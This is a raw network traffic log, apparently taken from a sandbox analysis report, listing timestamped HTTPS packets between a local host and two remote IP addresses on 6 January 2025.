                                                                                                                                                            Jan 6, 2025 23:05:10.450576067 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.450912952 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.453248978 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.453248978 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.453248978 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.453269005 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.453289032 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.453341007 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.521363974 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.521692991 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.521699905 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522093058 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522502899 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522576094 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522766113 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522862911 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522902966 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522952080 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522969007 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.522995949 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.523014069 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.529735088 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636212111 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636305094 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636358976 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636723042 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636735916 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636758089 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.636780977 CET49878443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.666161060 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.666201115 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.666268110 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.666651011 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.666663885 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.027296066 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.027370930 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.029258013 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.030087948 CET49879443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.030097961 CET4434987920.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.138272047 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.139986992 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.140006065 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.141037941 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.141122103 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.142293930 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.142352104 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.143409967 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.143416882 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.143455982 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.143481970 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.255119085 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.387187958 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.387279034 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.387423038 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.431246042 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.440366983 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.440390110 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.441905975 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.441930056 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.442302942 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.442682981 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.442745924 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.443166971 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.443344116 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.443372965 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.686506987 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.686582088 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:11.689852953 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.725569963 CET49888443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:11.725595951 CET4434988820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:13.759651899 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:13.759685993 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:13.759810925 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:13.760423899 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:13.760435104 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.230519056 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.230604887 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.350446939 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.350459099 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.350745916 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.351551056 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.351651907 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.351676941 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.351794004 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.351824999 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.351824999 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.351866961 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.351963043 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.352000952 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:14.352119923 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:14.352133036 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.123122931 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.123179913 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.123236895 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.126497030 CET49911443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.126513958 CET44349911104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.137141943 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.137173891 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.137238979 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.137465954 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.137476921 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.603542089 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.603604078 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.612663031 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.612678051 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.612880945 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.613858938 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.613873005 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.613878012 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.943305016 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.943356991 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.943408966 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.943516016 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.943527937 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.943545103 CET49919443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:15.943548918 CET44349919104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:15.947977066 CET49929443192.168.2.4104.21.80.52
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Jan 6, 2025 23:05:15.947987080 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:15.948038101 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:15.948362112 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:15.948374033 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.502500057 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.502609015 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.504192114 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.504199982 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.504429102 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.505357027 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.505469084 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.505474091 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.806149006 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.806200981 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.807188988 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.880578041 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.880590916 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.880760908 CET  49929        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.880765915 CET  443          49929      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.906039953 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.906049967 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:16.906204939 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.906474113 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:16.906482935 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.372443914 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.372518063 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.373944998 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.373954058 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.374178886 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.375727892 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.375755072 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.375757933 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.693306923 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.693372965 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.693429947 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.693484068 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.693491936 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.693514109 CET  49938        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.693517923 CET  443          49938      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.739382029 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.739418983 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:17.739470959 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.739761114 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:17.739773035 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.210118055 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.210321903 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.211638927 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.211647034 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.211869955 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.212573051 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.212688923 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.212722063 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.212796926 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.212826014 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.212898970 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.212949038 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.783271074 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.783339977 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.783410072 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.786861897 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.786876917 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.787015915 CET  49946        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.787022114 CET  443          49946      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.898699045 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.898745060 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:18.898915052 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.899311066 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:18.899323940 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.039081097 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.039104939 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.039170027 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.041208029 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.041224003 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.373985052 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.374062061 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.403639078 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.403652906 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.403877974 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.405742884 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.405846119 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.405875921 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.407015085 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.407048941 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.407140017 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.407166958 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.505362988 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.505450964 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.506917000 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.506925106 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.507148027 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.552309990 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.565030098 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.565078974 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.565083981 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904201031 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904244900 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904273987 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904297113 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.904304981 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904318094 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904354095 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.904370070 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904409885 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.904416084 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904647112 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904674053 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904690027 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.904697895 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.904742956 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.908936977 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.958554029 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.958563089 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.993670940 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.993705988 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.993726015 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.993735075 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.993782043 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.994004011 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.994335890 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.994379044 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.994385958 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.994453907 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.994474888 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.994504929 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.994513035 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.994551897 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.995155096 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.995208025 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.995238066 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.995261908 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.995266914 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.995277882 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.995306015 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.996016026 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.996059895 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.996066093 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.996092081 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.996119976 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.996174097 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.996181965 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:19.996256113 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:19.996903896 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.003037930 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.003106117 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.003164053 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.003247023 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.003261089 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.003318071 CET  49953        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.003321886 CET  443          49953      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.011514902 CET  49960        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.011554956 CET  443          49960      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.011617899 CET  49960        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.011885881 CET  49960        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.011898041 CET  443          49960      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.036676884 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.078351974 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.078448057 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.078491926 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.078500986 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.082269907 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.082302094 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.082328081 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.082341909 CET  49954        443        192.168.2.4   104.21.80.52
Jan 6, 2025 23:05:20.082350969 CET  443          49954      104.21.80.52  192.168.2.4
Jan 6, 2025 23:05:20.082377911 CET  49954        443        192.168.2.4   104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.082401037 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.082448006 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.082470894 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.082478046 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.082519054 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.082705975 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.082755089 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083128929 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.083168030 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083183050 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.083230972 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083235979 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.083266020 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.083291054 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083319902 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083389997 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083395958 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.083405972 CET49954443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.083409071 CET44349954104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.210799932 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.210814953 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.210974932 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.211239100 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.211258888 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.486263990 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.486339092 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.488023996 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.488035917 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.488267899 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.489059925 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.489247084 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.489250898 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.681513071 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.681591988 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.683123112 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.683130980 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.683363914 CET44349966104.21.80.52192.168.2.4
